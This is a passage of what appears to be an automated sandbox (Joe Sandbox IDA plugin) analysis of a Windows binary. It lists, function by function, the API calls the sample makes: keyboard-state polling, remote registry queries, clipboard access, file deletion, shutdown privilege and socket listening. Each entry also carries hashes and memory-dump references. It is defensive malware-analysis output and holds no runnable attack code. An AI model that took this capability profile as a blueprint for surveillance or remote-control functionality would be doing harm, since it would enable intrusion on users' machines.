                                                            • Opcode Fuzzy Hash: 322a472c24f7590266ca871a9dba0279fee7ba0bc205b2788cac348462230931
                                                            • Instruction Fuzzy Hash: CD31B6B5600209ABDB21DFA4DC49FEB37BCEF89741F1441B5FA09D6160E77096448B35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-4052911093
                                                            • Opcode ID: 714730177c228c46ea7f775f821316655d6032d785f51a5cb7bdd32ed35a8792
                                                            • Instruction ID: f1d9fd2fd334ef54f6b9773708fafe9eb2bb25a0db8ea99875ae3e54cab2f9e8
                                                            • Opcode Fuzzy Hash: 714730177c228c46ea7f775f821316655d6032d785f51a5cb7bdd32ed35a8792
                                                            • Instruction Fuzzy Hash: 43729375E00269DBDF14CF59D8407AEB7B5FF68314F14816AE859EB280E7309E81DBA0
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00D30097
                                                            • SetKeyboardState.USER32(?), ref: 00D30102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00D30122
                                                            • GetKeyState.USER32(000000A0), ref: 00D30139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00D30168
                                                            • GetKeyState.USER32(000000A1), ref: 00D30179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00D301A5
                                                            • GetKeyState.USER32(00000011), ref: 00D301B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00D301DC
                                                            • GetKeyState.USER32(00000012), ref: 00D301EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00D30213
                                                            • GetKeyState.USER32(0000005B), ref: 00D30221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 2da7a13cc046a20e8a0c811b6d1647b63e802fea5d105caff2ad4df297e3ec1b
                                                            • Instruction ID: 0ed0686b4c46211134f1a3d84da89e32f68ab77a78b1a5a6cf2ab752b3b5726f
                                                            • Opcode Fuzzy Hash: 2da7a13cc046a20e8a0c811b6d1647b63e802fea5d105caff2ad4df297e3ec1b
                                                            • Instruction Fuzzy Hash: 6E51D72490478829FB39DBA488657EABFB49F01380F0C459ED9C25B5C2DAA49B8CC775
                                                            APIs
                                                              • Part of subcall function 00D50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D504AC
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D5054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D505E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00D50822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D5082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 112d2f9e87d097a5f742d83d888b5b7d45794b23ba8d55391f2c500218c13cb6
                                                            • Instruction ID: a4c8fe65b161876720577473851e45fed5ce51dcb3af7a91a44ceae57edc4d2c
                                                            • Opcode Fuzzy Hash: 112d2f9e87d097a5f742d83d888b5b7d45794b23ba8d55391f2c500218c13cb6
                                                            • Instruction Fuzzy Hash: CBE15E31604314AFCB14DF28C891E2ABBE4EF89715F08856DF94ADB3A1D730E905DBA1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: ef41aff5941e903a191395e52c1065dd1497d29eb6c6de19198a0ce95668cc11
                                                            • Instruction ID: febda6c9ca5b31bcf2b9032e1db6c9bdb485f136af3465f704f3b2af529c63f3
                                                            • Opcode Fuzzy Hash: ef41aff5941e903a191395e52c1065dd1497d29eb6c6de19198a0ce95668cc11
                                                            • Instruction Fuzzy Hash: 42218D752003109FDB10AF24EC49B6E7BA8EF05711F14802AFA46DB3A1DB70A840DB68
                                                            APIs
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                              • Part of subcall function 00D34A31: GetFileAttributesW.KERNEL32(?,00D3370B), ref: 00D34A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D338A3
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00D3394B
                                                            • MoveFileW.KERNEL32(?,?), ref: 00D3395E
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00D3397B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D3399D
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00D339B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 5a5bb2bc82cd5ffb0c0b8d04911c277df562630097fbe4944baa336a8625d8a1
                                                            • Instruction ID: ec9ff1a23b7c9478fe2430563ed4868d829112af75157747488cee59128d60d9
                                                            • Opcode Fuzzy Hash: 5a5bb2bc82cd5ffb0c0b8d04911c277df562630097fbe4944baa336a8625d8a1
                                                            • Instruction Fuzzy Hash: 85518E3180514CEACF05EBA4DA929EDB779AF14301F6401AAF906B7291EF716F09DB70
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00D3F440
                                                            • Sleep.KERNEL32(0000000A), ref: 00D3F470
                                                            • _wcscmp.LIBCMT ref: 00D3F484
                                                            • _wcscmp.LIBCMT ref: 00D3F49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 00D3F53D
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 56e9f5db6f0bd72448bbf6bb231db94473d629be3ddaecbc6c64fdc8ed61169c
                                                            • Instruction ID: 3bbffc366c512dfb60962814af554697c1c0892a88eff8cfb555c40529982262
                                                            • Opcode Fuzzy Hash: 56e9f5db6f0bd72448bbf6bb231db94473d629be3ddaecbc6c64fdc8ed61169c
                                                            • Instruction Fuzzy Hash: E9416B71D0021EAFCF10EF64CC45AEEBBB4FF14310F184566E815A7291EB309A48DB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: cd71265b9a3ddf4052f51ac34988b02becf6d56a510bdf514ee2d947e24b45b0
                                                            • Instruction ID: 6e4e3ed810a27aa8d5e928f61b2f80a8c35c4c685a7082d807959bafabd905a5
                                                            • Opcode Fuzzy Hash: cd71265b9a3ddf4052f51ac34988b02becf6d56a510bdf514ee2d947e24b45b0
                                                            • Instruction Fuzzy Hash: 9312AB70A00619DFCF04DFA6D981AEEB7F5FF48304F20452AE446E7252EB35A915DB60
                                                            APIs
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                              • Part of subcall function 00D34A31: GetFileAttributesW.KERNEL32(?,00D3370B), ref: 00D34A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D33B89
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D33BD9
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D33BEA
                                                            • FindClose.KERNEL32(00000000), ref: 00D33C01
                                                            • FindClose.KERNEL32(00000000), ref: 00D33C0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: 4a5ba85a29e918ea3c0944f4721a8dde9491805cf63a96a8ff88c64a73b11553
                                                            • Instruction ID: 9ebd5695b7fb0cde032da1ce3e3d8d68d7d9231e61150a0cc1aeb68403965055
                                                            • Opcode Fuzzy Hash: 4a5ba85a29e918ea3c0944f4721a8dde9491805cf63a96a8ff88c64a73b11553
                                                            • Instruction Fuzzy Hash: 28318E310083859FC301EF24D9918AFB7A8BE91304F444E2EF9D5962A1EB31DA09D767
                                                            APIs
                                                              • Part of subcall function 00D287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D2882B
                                                              • Part of subcall function 00D287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D28858
                                                              • Part of subcall function 00D287E1: GetLastError.KERNEL32 ref: 00D28865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00D351F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: ab8d50f99f6ac269fd9adc2670a07e5169086076784b41f85b1913237c32eb0a
                                                            • Instruction ID: f02c163141b18a126eff6486d461861731d573bff43eff41858d081640a92d4e
                                                            • Opcode Fuzzy Hash: ab8d50f99f6ac269fd9adc2670a07e5169086076784b41f85b1913237c32eb0a
                                                            • Instruction Fuzzy Hash: 0F0126397917116BF7286368BC8AFBB7268EB04381F680520FD53EB1D6DA519C0086B8
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00D462DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D462EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00D46307
                                                            • listen.WSOCK32(00000000,00000005), ref: 00D46316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D46330
                                                            • closesocket.WSOCK32(00000000), ref: 00D46344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 81d98cb5c4d5a48df33cd4cbf44d43a2f1c3926d71532d07a46cc9997396eb77
                                                            • Instruction ID: 030a1be46d7cf7af5677ccc7ed9cb66a9017bc5038593e2974560c991e800dda
                                                            • Opcode Fuzzy Hash: 81d98cb5c4d5a48df33cd4cbf44d43a2f1c3926d71532d07a46cc9997396eb77
                                                            • Instruction Fuzzy Hash: FC219E75600304AFCB10EF64CC49A6EB7A9EF49721F18415AE956EB3D1C770ED01DB61
                                                            APIs
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                            • _memmove.LIBCMT ref: 00D20258
                                                            • _memmove.LIBCMT ref: 00D2036D
                                                            • _memmove.LIBCMT ref: 00D20414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: 4510a50d8df04abc4bd1b18b6c1c0db4a0eb28a322b58b300c6fe87bf0fea0d3
                                                            • Instruction ID: 7d6630849ddd08048b2bf652dda1eadec4afe1f5d3f90a312aaa7a075206f5d0
                                                            • Opcode Fuzzy Hash: 4510a50d8df04abc4bd1b18b6c1c0db4a0eb28a322b58b300c6fe87bf0fea0d3
                                                            • Instruction Fuzzy Hash: B702C2B0A00219DBCF04DF65D981ABEBBB5FF44304F24806AE906DB356EB31D954DBA1
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00CD19FA
                                                            • GetSysColor.USER32(0000000F), ref: 00CD1A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00CD1A61
                                                              • Part of subcall function 00CD1290: DefDlgProcW.USER32(?,00000020,?), ref: 00CD12D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 0e4032bc0217a7e039c3acd2fc3824e00d3ce2bccedce5b8d50f3ef3477c81a7
                                                            • Instruction ID: bea5ac4f6b2aab89df1d6abe2b79aa977324d66e58a38a979d278c5ab73b4f2f
                                                            • Opcode Fuzzy Hash: 0e4032bc0217a7e039c3acd2fc3824e00d3ce2bccedce5b8d50f3ef3477c81a7
                                                            • Instruction Fuzzy Hash: E1A159B011A654BEEA28AB2A9C54E7F359CDB41352B1C011BFF16D63D6CB20DE01A7B1
                                                            APIs
                                                              • Part of subcall function 00D47D8B: inet_addr.WSOCK32(00000000), ref: 00D47DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00D4679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D467C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00D46800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D4680D
                                                            • closesocket.WSOCK32(00000000), ref: 00D46821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 105463ef0b59931b51257b8e7c600b113b3a553adbd7ade234732ad828741442
                                                            • Instruction ID: 2a1256f916fca67f4cf13f86f7a419cdfc30079584e2188164b45147b949ec0b
                                                            • Opcode Fuzzy Hash: 105463ef0b59931b51257b8e7c600b113b3a553adbd7ade234732ad828741442
                                                            • Instruction Fuzzy Hash: 2841B475A00310AFDB10BF64CC86F6E77A9DF49B14F04845DFA56AB3D2CA709D00A7A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 5c79afdbf3114798db84bdd4c8b7f5a2175e8db9a66b7c16747dc893ad031e3b
                                                            • Instruction ID: 9dbfd1840c1afbd3a3611a3492e94592008253ca9f4d55cce78222ecdfa9b8c6
                                                            • Opcode Fuzzy Hash: 5c79afdbf3114798db84bdd4c8b7f5a2175e8db9a66b7c16747dc893ad031e3b
                                                            • Instruction Fuzzy Hash: 0711B231300B11ABEF226F26EC54A6EBB99EF447A2B454029FC49D7391DB70DD0186B0
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D280C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D280CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D280D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D280E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D280F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 482c71cd4d12ac170bd5d529ae993b8e65e5d63d8678a57bf7b109a561044575
                                                            • Instruction ID: d263c2c82c5ce8763e12bf045f4dae9f2beed230b458e93859c29c860e79b2c8
                                                            • Opcode Fuzzy Hash: 482c71cd4d12ac170bd5d529ae993b8e65e5d63d8678a57bf7b109a561044575
                                                            • Instruction Fuzzy Hash: C4F06231246314AFEB110FA5EC8DE6B3BACEF5975AB080025FD45CB290CF619C51EA70
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00D3C432
                                                            • CoCreateInstance.OLE32(00D62D6C,00000000,00000001,00D62BDC,?), ref: 00D3C44A
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • CoUninitialize.OLE32 ref: 00D3C6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 97ed53e57c60138ff68379453047b13711e6b42ef0c4b337972b64f41fb921bc
                                                            • Instruction ID: 0fcc939e804bfe238542746c45768536b07d267a7a2fd5657064604beed1b493
                                                            • Opcode Fuzzy Hash: 97ed53e57c60138ff68379453047b13711e6b42ef0c4b337972b64f41fb921bc
